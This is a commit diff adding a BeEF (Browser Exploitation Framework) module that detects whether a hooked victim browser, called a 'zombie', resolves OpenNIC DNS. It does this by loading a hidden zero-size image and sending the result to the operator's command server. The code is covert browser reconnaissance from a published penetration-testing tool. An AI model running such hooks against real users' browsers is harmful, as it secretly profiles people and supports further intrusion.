Detect OpenNIC DNS (#2341)

modules/network/detect_opennic/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	if (document.getElementById('opennic_img_<%= @command_id %>')) {
+		return "Img already created";
+	}
+
+	var img = new Image();
+	img.setAttribute("style", "visibility:hidden");
+	img.setAttribute("width", "0");
+	img.setAttribute("height", "0");
+	img.src = '<%= @opennic_resource %>';
+	img.id = 'opennic_img_<%= @command_id %>';
+	img.setAttribute("attr", "start");
+	img.onerror = function() {
+		this.setAttribute("attr", "error");
+	};
+	img.onload = function() {
+		this.setAttribute("attr", "load");
+	};
+
+	document.body.appendChild(img);
+
+	setTimeout(function() {
+		var img = document.getElementById('opennic_img_<%= @command_id %>');	
+		if (img.getAttribute("attr") == "error") {
+      beef.debug('[Detect OpenNIC] Browser is not resolving OpenNIC domains.');
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not resolving OpenNIC domains.');
+		} else if (img.getAttribute("attr") == "load") {
+      beef.debug('[Detect OpenNIC] Browser is resolving OpenNIC domains.');
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is resolving OpenNIC domains.');
+		} else if (img.getAttribute("attr") == "start") {
+      beef.debug('[Detect OpenNIC] Timed out. Cannot determine if browser is resolving OpenNIC domains.');
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timed out. Cannot determine if browser is resolving OpenNIC domains.');
+		};
+		document.body.removeChild(img);
+		}, <%= @timeout %>);
+
+});

modules/network/detect_opennic/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_opennic:
+            enable: true
+            category: "Network"
+            name: "Detect OpenNIC DNS"
+            description: "This module will detect if the zombie is currently using OpenNIC DNS resolvers.</br><br/>Note that the detection may fail when attempting to load a HTTP resource from a hooked HTTPS page."
+            authors: ["wade", "pdp", "bm", "xntrik", "bcoles"]
+            target:
+                working: ["ALL"]

modules/network/detect_opennic/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_opennic < BeEF::Core::Command
+  def self.options
+    [
+      { 'name' => 'opennic_resource', 'ui_label' => 'What OpenNIC image resource to request', 'value' => 'http://be.libre/lang/flag/us.png' },
+      { 'name' => 'timeout', 'ui_label' => 'Detection timeout', 'value' => '10000' }
+    ]
+  end
+
+  def post_execute
+    return if @datastore['result'].nil?
+
+    save({ 'result' => @datastore['result'] })
+  end
+end